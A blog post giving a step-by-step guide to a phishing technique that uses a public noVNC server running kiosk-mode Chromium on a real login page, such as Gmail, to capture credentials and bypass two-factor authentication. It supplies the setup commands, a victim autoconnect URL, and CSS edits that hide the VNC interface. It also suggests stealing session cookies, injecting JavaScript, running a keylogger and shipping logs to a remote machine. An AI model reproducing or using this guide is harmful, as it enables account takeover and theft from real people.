Post

Exploiting noVNC for 2FA Bypass

Posted
Preview Image
By Diogo Lages
3 min read
Exploiting noVNC for 2FA Bypass

Using noVNC for Credential Acquisition and Bypassing 2FA

noVNC is both a JavaScript library for VNC clients and an application built on top of this library. Compatible with any modern browser, including mobile versions for iOS and Android, noVNC allows the web browser to function as a VNC client, enabling remote access to a machine.

So, how can we use noVNC to acquire credentials and bypass 2FA? Here’s the process:

  1. Set up a server with noVNC.
  2. Start Chromium (or any other browser) in Kiosk mode.
  3. Direct it to the desired website for user authentication (e.g., accounts.google.com).
  4. Send the link to the target user. When they click the URL, they will access the VNC session without realizing it.
  5. Since Chromium is configured in Kiosk mode, the user experience will appear as a normal web page.

Exploitation Possibilities

The exploitation possibilities of this method are vast:

  • Inject JS into the browser.
  • Use an HTTP proxy connected to the browser to log all activities.
  • Terminate the VNC session after user authentication.
  • Capture the browser session token (Right-click > Inspect > Application > Cookies) after the user disconnects.
  • Run a background keylogger.
  • Or get creative and find other approaches (remember, the server is yours).

noVNC Setup and Demonstration

1. Deploy a Kali Linux Instance

Use any cloud service provider or deploy locally to set up a Linux machine. I will use Kali Linux for this demonstration because I prefer it, but you can choose any other Linux distribution you are comfortable with.

2. Install TigerVNC

First, you need to install VNC software. I tested two options: X11vnc and TigerVNC. After several tests, I chose to use TigerVNC.

1
2

sudo apt update
sudo apt install tigervnc-standalone-server tigervnc-xorg-extension tigervnc-viewer

3. Set Up a VNC Password

1

vncpasswd

On Kali Linux, I didn’t need to create the xstartup file, but if you encounter any errors, you can configure it manually.

1

nano ~/.vnc/xstartup

Paste or write the following:

1
2
3
4
5
6
7
8

#!/bin/sh
xrdb "$HOME/.Xresources"
xsetroot -solid grey
x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
x-window-manager &
# Fix to make GNOME work
export XKL_XMODMAP_DISABLE=1
/etc/X11/Xsession

Add execution permissions:

1

chmod +x ~/.vnc/xstartup

4. Restart the VNC Server

Restart the VNC server, choosing the screen size settings according to your needs. noVNC automatically adjusts to the browser’s screen size, but do your own testing.

1

vncserver -depth 32 -geometry 1920x1080

5. Download and Run noVNC

1

git clone https://github.com/novnc/noVNC.git

OR

1

apt install novnc

Now run noVNC locally or publicly. Here are the commands:

  • Check the VNC server port:
1

vncserver -list

Example: 5901, 5902, 5903, etc.

  • Run noVNC:
1

./noVNC/utils/novnc_proxy --vnc localhost:5901
  • Set up an SSH tunnel:
1

ssh -L 6080:127.0.0.1:6080 root@server
  • Run publicly using port 8081:
1
2

ufw allow http
./noVNC/utils/novnc_proxy --vnc 0.0.0.0:5901 --listen 8081

6. Access VNC and Run the Browser in Kiosk Mode

Access your VNC and run the browser in Kiosk mode. I used Chromium, but you can use whatever suits your needs.

1

chromium --no-sandbox --app=https://gmail.com --kiosk

7. Send the URL to the “Victim” to Connect Automatically

1

http://127.0.0.1:6080/vnc.html?autoconnect=true&password=YOUR-PASSWORD

The autoconnect=true&password=VNCPASSWORD will make the user authenticate automatically. If you want to rename the query parameter, you can modify the vnc.html file.

8. Modify the CSS to Remove Visual Elements

noVNC displays a custom loading page, a VNC control bar, and some additional unnecessary visual elements that should be removed.

Open vnc.html, find the divs below, and add the CSS style shown.

1
2
3
4
5
6

<!-- Hide unnecessary items -->
<div id="noVNC_control_bar_anchor" class="noVNC_vcenter" style="display:none;">
<div id="noVNC_status" style="display:none"></div>

<!-- Makes the loading page white -->
<div id="noVNC_transition" style="background-color:white;color:white">

Important Notes

  • You are giving remote access to your machine! It should not have anything valuable stored on it.
  • Any logged data should likely be sent to a remote machine.
  • Do not use the root account. Set up a restricted user account that uses the VNC service.
  • Configure the Kiosk mode more restrictively.
Exploits, noVNC
Exploits noVNC 2FA Bypass
This post is licensed under CC BY 4.0 by the author.